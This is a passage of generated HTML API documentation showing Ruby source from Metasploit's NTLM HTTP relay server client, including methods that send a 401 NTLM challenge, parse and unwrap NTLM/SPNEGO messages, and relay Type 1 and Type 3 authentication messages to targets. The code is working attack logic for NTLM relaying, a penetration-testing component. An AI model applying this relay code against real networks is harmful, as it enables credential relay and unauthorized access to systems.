<span class='id identifier rubyid_complete_current_relay_attempt'>complete_current_relay_attempt</span><span class='lparen'>(</span><span class='label'>is_success:</span> <span class='id identifier rubyid_relay_succeeded'>relay_succeeded</span><span class='comma'>,</span> <span class='label'>identity:</span> <span class='id identifier rubyid_identity'>identity</span><span class='rparen'>)</span>
<span class='id identifier rubyid_relay_completed'>relay_completed</span> <span class='op'>=</span> <span class='kw'>true</span>
<span class='ivar'>@state</span> <span class='op'>=</span> <span class='symbol'>:done</span>
<span class='id identifier rubyid_advance_to_next_target_via_redirect'>advance_to_next_target_via_redirect</span>
<span class='kw'>rescue</span> <span class='const'>StandardError</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Relaying type 3 message to target </span><span class='embexpr_beg'>#{</span><span class='ivar'>@current_target</span><span class='period'>.</span><span class='id identifier rubyid_ip'>ip</span><span class='embexpr_end'>}</span><span class='tstring_content'> failed: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_complete_current_relay_attempt'>complete_current_relay_attempt</span><span class='lparen'>(</span><span class='label'>is_success:</span> <span class='kw'>false</span><span class='comma'>,</span> <span class='label'>identity:</span> <span class='id identifier rubyid_identity'>identity</span><span class='rparen'>)</span> <span class='kw'>unless</span> <span class='id identifier rubyid_relay_completed'>relay_completed</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="process_request-instance_method">
#<strong>process_request</strong>(req) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 25</span>
<span class='kw'>def</span> <span class='id identifier rubyid_process_request'>process_request</span><span class='lparen'>(</span><span class='id identifier rubyid_req'>req</span><span class='rparen'>)</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Processing request in state </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_state'>state</span><span class='embexpr_end'>}</span><span class='tstring_content'> from </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_auth_header'>auth_header</span> <span class='op'>=</span> <span class='id identifier rubyid_req'>req</span><span class='period'>.</span><span class='id identifier rubyid_headers'>headers</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Authorization</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_auth_type'>auth_type</span><span class='comma'>,</span> <span class='id identifier rubyid_b64_message'>b64_message</span> <span class='op'>=</span> <span class='id identifier rubyid_extract_ntlm_message'>extract_ntlm_message</span><span class='lparen'>(</span><span class='id identifier rubyid_auth_header'>auth_header</span><span class='rparen'>)</span>
<span class='id identifier rubyid_parsed_ntlm'>parsed_ntlm</span> <span class='op'>=</span> <span class='kw'>nil</span>
<span class='id identifier rubyid_raw_ntlm_bytes'>raw_ntlm_bytes</span> <span class='op'>=</span> <span class='kw'>nil</span>
<span class='kw'>if</span> <span class='id identifier rubyid_b64_message'>b64_message</span>
<span class='kw'>begin</span>
<span class='id identifier rubyid_raw_ntlm_bytes'>raw_ntlm_bytes</span> <span class='op'>=</span> <span class='id identifier rubyid_unwrap_ntlm_base64'>unwrap_ntlm_base64</span><span class='lparen'>(</span><span class='id identifier rubyid_b64_message'>b64_message</span><span class='rparen'>)</span>
<span class='id identifier rubyid_parsed_ntlm'>parsed_ntlm</span> <span class='op'>=</span> <span class='const'>Net</span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Message</span><span class='period'>.</span><span class='id identifier rubyid_parse'>parse</span><span class='lparen'>(</span><span class='id identifier rubyid_raw_ntlm_bytes'>raw_ntlm_bytes</span><span class='rparen'>)</span>
<span class='kw'>rescue</span> <span class='op'>::</span><span class='const'>Exception</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Failed to parse incoming NTLM/SPNEGO message: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_abort_connection'>abort_connection</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Invalid NTLM payload.</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='kw'>case</span> <span class='id identifier rubyid_state'>state</span>
<span class='kw'>when</span> <span class='symbol'>:unauthenticated</span>
<span class='kw'>if</span> <span class='id identifier rubyid_parsed_ntlm'>parsed_ntlm</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_send_401_challenge'>send_401_challenge</span>
<span class='kw'>elsif</span> <span class='id identifier rubyid_parsed_ntlm'>parsed_ntlm</span><span class='period'>.</span><span class='id identifier rubyid_is_a?'>is_a?</span><span class='lparen'>(</span><span class='const'>Net</span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Message</span><span class='op'>::</span><span class='const'>Type1</span><span class='rparen'>)</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Received Type 1 message from </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='embexpr_end'>}</span><span class='tstring_content'>, attempting to relay...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_handle_type1'>handle_type1</span><span class='lparen'>(</span><span class='id identifier rubyid_raw_ntlm_bytes'>raw_ntlm_bytes</span><span class='comma'>,</span> <span class='id identifier rubyid_parsed_ntlm'>parsed_ntlm</span><span class='comma'>,</span> <span class='id identifier rubyid_auth_type'>auth_type</span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_abort_connection'>abort_connection</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Expected No Auth or Type 1, got something else.</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>when</span> <span class='symbol'>:awaiting_type3</span>
<span class='kw'>if</span> <span class='id identifier rubyid_parsed_ntlm'>parsed_ntlm</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_parsed_ntlm'>parsed_ntlm</span><span class='period'>.</span><span class='id identifier rubyid_is_a?'>is_a?</span><span class='lparen'>(</span><span class='const'>Net</span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Message</span><span class='op'>::</span><span class='const'>Type3</span><span class='rparen'>)</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Received Type 3 message from </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='embexpr_end'>}</span><span class='tstring_content'>, attempting to relay...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_handle_type3'>handle_type3</span><span class='lparen'>(</span><span class='id identifier rubyid_parsed_ntlm'>parsed_ntlm</span><span class='rparen'>)</span>
<span class='kw'>elsif</span> <span class='id identifier rubyid_parsed_ntlm'>parsed_ntlm</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_parsed_ntlm'>parsed_ntlm</span><span class='period'>.</span><span class='id identifier rubyid_is_a?'>is_a?</span><span class='lparen'>(</span><span class='const'>Net</span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Message</span><span class='op'>::</span><span class='const'>Type1</span><span class='rparen'>)</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_warning'>print_warning</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Client restarted the handshake! Resetting state to handle new Type 1...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='ivar'>@relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_disconnect!'>disconnect!</span> <span class='kw'>if</span> <span class='ivar'>@relayed_connection</span>
<span class='ivar'>@relayed_connection</span> <span class='op'>=</span> <span class='kw'>nil</span>
<span class='id identifier rubyid_handle_type1'>handle_type1</span><span class='lparen'>(</span><span class='id identifier rubyid_raw_ntlm_bytes'>raw_ntlm_bytes</span><span class='comma'>,</span> <span class='id identifier rubyid_parsed_ntlm'>parsed_ntlm</span><span class='comma'>,</span> <span class='id identifier rubyid_auth_type'>auth_type</span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_abort_connection'>abort_connection</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Expected Type 3, got something else.</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>when</span> <span class='symbol'>:done</span>
<span class='comment'># The relay is finished for this connection, ignore further requests
</span> <span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="send_401_challenge-instance_method">
#<strong>send_401_challenge</strong> &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
101
102
103
104
105
106
107
108
109
110
111</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 101</span>
<span class='kw'>def</span> <span class='id identifier rubyid_send_401_challenge'>send_401_challenge</span>
<span class='id identifier rubyid_res'>res</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto/Http.html" title="Rex::Proto::Http (module)">Http</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto/Http/Response.html" title="Rex::Proto::Http::Response (class)">Response</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../../../../../Rex/Proto/Http/Response.html#initialize-instance_method" title="Rex::Proto::Http::Response#initialize (method)">new</a></span></span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_code'>code</span> <span class='op'>=</span> <span class='int'>401</span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Unauthorized</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_headers'>headers</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>WWW-Authenticate</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>NTLM, Negotiate</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_headers'>headers</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Connection</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Keep-Alive</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_headers'>headers</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Content-Length</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>0</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_body'>body</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_put'>put</span><span class='lparen'>(</span><span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="unwrap_ntlm_base64-instance_method">
#<strong>unwrap_ntlm_base64</strong>(b64_msg) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
</div>
</div>
<div class="tags">
<p class="tag_title">Raises:</p>
<ul class="raise">
<li>
<span class='type'>(<tt>ArgumentError</tt>)</span>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 295</span>
<span class='kw'>def</span> <span class='id identifier rubyid_unwrap_ntlm_base64'>unwrap_ntlm_base64</span><span class='lparen'>(</span><span class='id identifier rubyid_b64_msg'>b64_msg</span><span class='rparen'>)</span>
<span class='id identifier rubyid_buf'>buf</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_decode_base64'>decode_base64</span><span class='lparen'>(</span><span class='id identifier rubyid_b64_msg'>b64_msg</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_valid_ntlm_blob?'>valid_ntlm_blob?</span><span class='lparen'>(</span><span class='id identifier rubyid_buf'>buf</span><span class='rparen'>)</span>
<span class='ivar'>@ntlm_context</span><span class='lbracket'>[</span><span class='symbol'>:wrapper</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='symbol'>:none</span>
<span class='kw'>return</span> <span class='id identifier rubyid_buf'>buf</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_gss_api'>gss_api</span> <span class='op'>=</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>ASN1</span><span class='period'>.</span><span class='id identifier rubyid_decode'>decode</span><span class='lparen'>(</span><span class='id identifier rubyid_buf'>buf</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_gss_api'>gss_api</span><span class='op'>&amp;.</span><span class='id identifier rubyid_tag'>tag</span> <span class='op'>==</span> <span class='int'>0</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_gss_api'>gss_api</span><span class='op'>&amp;.</span><span class='id identifier rubyid_tag_class'>tag_class</span> <span class='op'>==</span> <span class='symbol'>:APPLICATION</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Detected GSS-SPNEGO wrapping around the type1 NTLM message</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='ivar'>@ntlm_context</span><span class='lbracket'>[</span><span class='symbol'>:wrapper</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='symbol'>:gss_spnego</span>
<span class='kw'>return</span> <span class='id identifier rubyid_process_gss_spnego_init'>process_gss_spnego_init</span><span class='lparen'>(</span><span class='id identifier rubyid_buf'>buf</span><span class='rparen'>)</span>
<span class='kw'>elsif</span> <span class='id identifier rubyid_gss_api'>gss_api</span><span class='op'>&amp;.</span><span class='id identifier rubyid_tag'>tag</span> <span class='op'>==</span> <span class='int'>1</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_gss_api'>gss_api</span><span class='op'>&amp;.</span><span class='id identifier rubyid_tag_class'>tag_class</span> <span class='op'>==</span> <span class='symbol'>:CONTEXT_SPECIFIC</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Detected GSS-SPNEGO wrapping around the type3 NTLM message</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='ivar'>@ntlm_context</span><span class='lbracket'>[</span><span class='symbol'>:wrapper</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='symbol'>:gss_spnego</span>
<span class='kw'>return</span> <span class='id identifier rubyid_process_gss_spnego_targ'>process_gss_spnego_targ</span><span class='lparen'>(</span><span class='id identifier rubyid_buf'>buf</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_raise'>raise</span> <span class='const'>ArgumentError</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Unrecognized NTLM or SPNEGO payload</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:03:55 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>